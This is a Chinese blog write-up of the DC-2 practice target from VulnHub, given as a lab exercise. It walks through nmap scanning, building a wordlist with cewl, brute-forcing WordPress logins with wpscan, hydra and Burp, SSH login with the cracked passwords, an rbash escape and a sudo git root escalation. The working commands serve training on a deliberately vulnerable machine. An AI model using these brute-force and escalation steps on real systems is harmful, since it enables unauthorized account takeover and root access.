dc2靶机--暴力破解篇

最新推荐文章于 2024-02-13 19:50:14 发布
最新推荐文章于 2024-02-13 19:50:14 发布
阅读量687 收藏 4
点赞数
分类专栏: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46527080/article/details/112717914
版权

要准备一台kali
一台dc2的靶机 靶机下载地址:https

目录

一、信息收集

1.主机发现

nmap  -sn 192.168.77.0/24

在这里插入图片描述

2.端口扫描

 nmap -A -p- 192.168.77.133   (扫描全部端口)

在这里插入图片描述
发现开放了80(apache)端口和7744(ssh)端口

3.访问ip地址

发现访问失败
我在网上看到的教程需要把hosts解析文件给配置一下就可以了
Linux路径

vim/etc/hosts

windows路径

C:\Windows\System32\drivers\etc

在这里插入图片描述这次我们来进行访问一下,发现访问成功
成功跳转进来了
在这里插入图片描述搭眼一看发现是wordpress的cms,之前我们打过一个靶机就是这个的
我们再来研究研究
我们在页面上发现了flag的字样
我们进去看一下
在这里插入图片描述发现事情并不是想想的那么简单,但是我们翻译一下就发现简单许多了
看下面说的可以用cewl字典生成工具,这个就是可以将网站上的所有敏感的密码生成到一个文件里面
在这里插入图片描述

二、密码爆破

cewl http://dc-2/ -w ~/dc2.txt   //生成字典

在这里插入图片描述发现生成了好多敏感的密码

用户名枚举

wpscan --url http://dc-2 -e u

在这里插入图片描述发现枚举出来了三个
admin tom jerry
将这个三个用户名放到一个txt文档里面,方便到后面进行爆破
在这里插入图片描述

暴力破解

1.wpscan
wpscan --url http://dc-2  --passwords /dc2.txt  --usernames /dc2user.txt

在这里插入图片描述

Username: jerry, Password: adipiscing
 Username: tom, Password: parturient

发现爆出来了tom和jerry

2.hydra

使用hydra表单暴力破解(上一种方法就可以,我这里为了复习一下知识,所以都写上了)

这个情况我们就需要先抓包,进行分析他的表单,要找到后台的表单就需要先知道他的后台登录的目录,然后我们要结合(三)进行目录爆破
再使用这个hydra来做
在这里插入图片描述进行抓包
在这里插入图片描述我们也可以在bp种进行暴力破解

然后构造hydra的payload

hydra -L dc2user.txt  -P dc2.txt  dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

在这里插入图片描述说实话用九头蛇非常麻烦,不如用上一个wpscan

3.brup

使用bp进行暴力破解
在这里插入图片描述首先将抓的包发送到暴力破解模块
设置攻击为最后一个集束炸弹

在这里插入图片描述设置payload
在这里插入图片描述
在这里插入图片描述
然后进行爆破就可以了

三、目录爆破

只单单是这样还是不够的,我们需要进行爆破目录,因为我们现在还不知道他的后台,这样没法暴力破解他的密码

dirb http://dc-2

在这里插入图片描述首先我们进入他的后台登录页面
使用我们刚才爆破出来的密码,进行登录
在这里插入图片描述
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
在这里插入图片描述我们使用jerry登录进去之后,点击flag2给的提示

这个提示说的不能用wordpress走捷径,所以我们只能利用之前的信息收集

发现了22端口也开放着,我们又知道了两个用户名和密码

登录一下试试

ssh -p 7744 tom@192.168.77.133

在经历了很多次的不明文密码的输入,终于登录成了
在这里插入图片描述进入终端命令行第一件事肯定要查看当前目录有什么,当我们进行cat的时候,发现了
他说没有这个命令,怎么可能呢,我去网上搜了一下,说的意思好像是有rbash的限制,我们要做的就是绕过rbash进行提权
在这里插入图片描述

四、提权

切换用户

查看文件,发现flag3,txt 执行命令发现 command not found,这是因为ssh远程连接到服务器的环境变量中不包含对应可执行文件的路径。需要自行添加

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a 
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin

发现配置完成之后,可以直接进行执行命令

在这里插入图片描述我们在翻译一下内容是什么意思
在这里插入图片描述大概就是要切换到jerry用户
在这里插入图片描述发现切换成功
我们在进行查看一下目录里面有什么东西

在home目录下边的jerry的目录下边存在flag4.txt
在这里插入图片描述我们翻译过来看一下说的什么提示
在这里插入图片描述
大概是让我们提权的意思

以下是看的教程
查看jerry可以以root用户的身份执行git命令并且不需要密码
在这里插入图片描述

提权

两种方法

1、sudo git help config
在末行命令模式输入  !/bin/bash 或 !'sh' 完成提权
2、sudo git -p help
      !/bin/bash

我们这里用的第一种方法
在这里插入图片描述发现提权成功
在这里插入图片描述我们找找最后一个flag
在~目录下边
在这里插入图片描述完成~~~

24team
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC2靶机练习
LSYZWF的博客
04-22 299
实验环境:DC-2靶机,kali linux攻击机,win10辅助机 靶机: 链接:https://pan.baidu.com/s/1naWHuZDDwWOI2zqO6vG6OA 提取码:rkzw 1、kali主机扫描内网存活主机 查询kali主机的ip地址:192.168.246.130 创建DC2专用文件夹 开始扫描 继续具体扫描目标主机 开放的端口 目标系统开放了80端口与7744端口 开放了80端口,用浏览器访问ip地址,发现网页打不开,但是网址重定向为http://dc-2 所以需要在物
dc2irc Relay-开源
05-01
NMDC到IRC中继服务器。 将自己公开为IRC服务器,IRC客户端可以连接到该服务器,然后加入对应于集线器地址的通道,该通道将允许对符合NMDC的集线器进行聊天访问。 与eggdrop机器人完美配合以提供游戏。
Pikachu靶机--暴力破解
m0_51966419的博客
05-16 456
定义 暴力破解:连续性尝试+字典+自动化 连续性尝试:指不停的利用不同的账号密码进行测试 字典:不同的可能成功登录web的常用或通过信息收集利用脚本生成的用户名或密码 自动化:利用脚本或者现成的软件来进行连续性测试 暴力破解原理 文章目录暴力破解原理一、定义二、暴力破解漏洞形成的原因三、总结 一、定义 暴力破解:连续性尝试+字典+自动化 连续性尝试:指不停的利用不同的账号密码进行测试 字典:不同的可能成功登录web的常用或通过信息收集利用脚本生成的用户名或密码 自动化:利用脚本或者现成的软件来进行连续性测试
靶机(potato-suncsr)——ssh暴力破解(工具包括:cewl(爬虫)、hydra(九头蛇)、nmap、arp-scan、dirsearch)
一大口木的博客
04-11 2229
第一次使用靶机,很好玩,我感觉靶机就是有漏洞的一个虚拟机,你可以在vmware里打开,然后用kali攻击,获取权限,或者盗取信息链接: https://pan.baidu.com/s/1KFYQkEP_KAr3lJZOfQ2-Ig?pwd=2cbh 提取码: 2cbh 复制这段内容后打开百度网盘手机App,操作更方便哦开始正题。
DC-2靶机
m0_62094846的博客
01-29 3451
前面做法和DC-1差不多,信息收集 ifconfig nmap 192.168.61.0/24 输入IP后会跳转域名,但是无法访问页面 发现问题是本地无法解析域名dc-2(看的别人的解释) 要配置可以解析的文件 在命令行中输入 vim /etc/hosts (修改配置文件需要root权限) 要在虚拟机中输入IP才可以,因为文件是在虚拟机配置的 flag1: 提示爆破字典只需要cewl产生的字典即可,并且可能可以爆破出两个不同的账号,可能一个无效 ...
【DC-2靶机
qq_40646572的博客
05-04 1911
信息搜集 通过nmap扫描,发现dc2靶机存在80端口以及7744端口。 通过nmap中的-sV指令发现7744端口是ssh端口。 通过nmap中的script的脚本扫描,发现用户名,先保存下。 打开dc2靶机,发现dns解析错误。配置下hosts文件。 Flag搜集 找到flag1。提示使用cewl爬取单词生成字典。 可能存在Ssh爆破,或者http爆破。 经过目录扫描,发现后台。 通过hydra工具爆破http服务。获取到两个登录用户。 存在两个账号: useraname:
Python库 | ruamel.dc2service-0.2.4-py2.py3-none-any.whl
04-25
资源分类:Python库 所属语言:Python 使用前提:需要解压 资源全名:ruamel.dc2service-0.2.4-py2.py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
DC2-analysis:DC2数据集的常规分析工具
05-10
DC2分析 该存储库包含DC2模拟数据集的常规分析脚本。 特定于项目的工作可以在单独的存储库中完成,但是一些分析任务通常会很有用,并且可以在此处包括相关的脚本和笔记本以供更一般的使用。 :right_arrow: ! 链接...
DC2-12001 采购过程控制程序.doc
10-01
DC2-12001 采购过程控制程序.doc
DC-2 靶机
m0_56171651的博客
08-16 1209
DC-2靶机渗透复现
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开在7744端口上,使用爆破得到的账号密码进行登录,tom登陆成功,在tom主目录下找到flag3 绕过tom的rbash限制,切换到jerry用户,在主目录发现flag4 使用jerry用户通过git提权,进入root目录找到final_flag
DC-2靶机攻略
weixin_43179779的博客
10-16 1836
DC-2靶机攻略
靶机-DC2
-----------------------------------------------------------------------------------------
11-27 951
修改 hosts 文件来访问网站。使用 cewl 制作字典。使用 wpscan 对 WordPress 站点进行扫描和爆破。rbash 绕过sudo 提权git 提权如果不能输入,说明你的shell窗口不够小。[外链图片转存中…(img-f5Hv34cb-1701085667765)]找到最后flag[外链图片转存中…(img-RbBeuBEM-1701085667766)]修改 hosts 文件来访问网站。使用 cewl 制作字典。
vulnhub之DC2靶机
LainWith的博客
08-16 1477
靶机概览信息收集nmap信息收集网站信息收集Flag1爬站目录扫描列出站点的用户名、账号渗透攻击爆破后台访问网站Flag2爆破ssh登录ssh绕过rbash拿flag3拿下jerry拿下flag4提权git提权flag5 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机.
Vulnhub靶机DC2
qq_48904485的博客
02-13 409
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机DC2(10.0.2.55)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/
【Vulnhub靶机系列】DC2
Ms08067安全实验室
04-23 568
文章来源|MS08067 安全实验室本文作者:大方子(Ms08067实验室核心成员)基本信息Kali:192.168.61.145DC2:192.168.61.162实验过程在Kali中先...
靶机 DC-2
m0_66299232的博客
09-13 1037
rbash是什么?rbash与一般shell的区别在于会限制一些行为,让一些命令无法执行。1>如何设置一个rbashcp /bin/bash /bin/rbash # 复制一个bash,重命名为rbashmkdir -p /home/test/.bin # 在test用户下新建一个.bin目录存放可以执行的命令2>rbash提权export -p //查看环境变量a //把/bin/sh给a/bin/bash。
DC-2靶机详解
TonyChaoWei的博客
02-07 1447
上面使用了 wpscan 进行了扫描和爆破,但是漏洞扫描没有任何结果,因为现在 wpscan 扫描漏洞需要 API Token 的支持,所以需要访问 https://wpvulndb.com/users/sign_up 注册一个账号,获得 API Token。根据信息,CVE 编号为 CVE-2019-8942、CVE-2019-8943,MSF 里正好有模块,不过其实是不好利用的,因为这个漏洞是通过文件上传造成的,而 jerry 和 tom 都无法上传,只有 admin 有权限修改上传点。
微信公众号测试号token出现{"errcode":40013,"errmsg":"invalid appid rid: 6678dc2b-4c976383-4291b712"}
最新发布
06-25
出现这个错误提示 "errcode: 40013, errmsg: 'invalid appid rid: 6678dc2b-4c976383-4291b712'" 是因为在使用微信公众号的测试号时,可能遇到了以下几个问题: 1. **AppID或AppSecret不匹配**:检查你提供的AppID(应用标识)和对应的AppSecret(应用密钥)是否正确,两者需要一一对应,且都在有效期内。 2. **Token已过期**:微信公众号的Token是有有效期限制的,如果之前未更新或者已经过期,你需要在微信公众平台上刷新Token。 3. **Rid(Request ID)错误**:有时可能是请求ID(RID)的问题,这通常在分布式系统中可能出现,可能是API调用的顺序或配置问题。 4. **权限问题**:确保你有权限使用测试号的相应接口,特别是获取Token的接口,如果没有正确的权限设置,也会导致此错误。 为了解决这个问题,请按照以下步骤操作: - 确认AppID和AppSecret是否输入正确,可以在微信公众平台管理后台进行核对。 - 如果Token已过期,登录微信公众平台,进入“开发”->“基本配置”,点击“刷新Token”按钮。 - 检查你的调用代码是否有并发请求处理,确保每次请求都有唯一的RID。 - 如果以上都正常,尝试联系微信公众平台的技术支持,提供详细的错误日志和使用场景,以便他们帮助定位问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值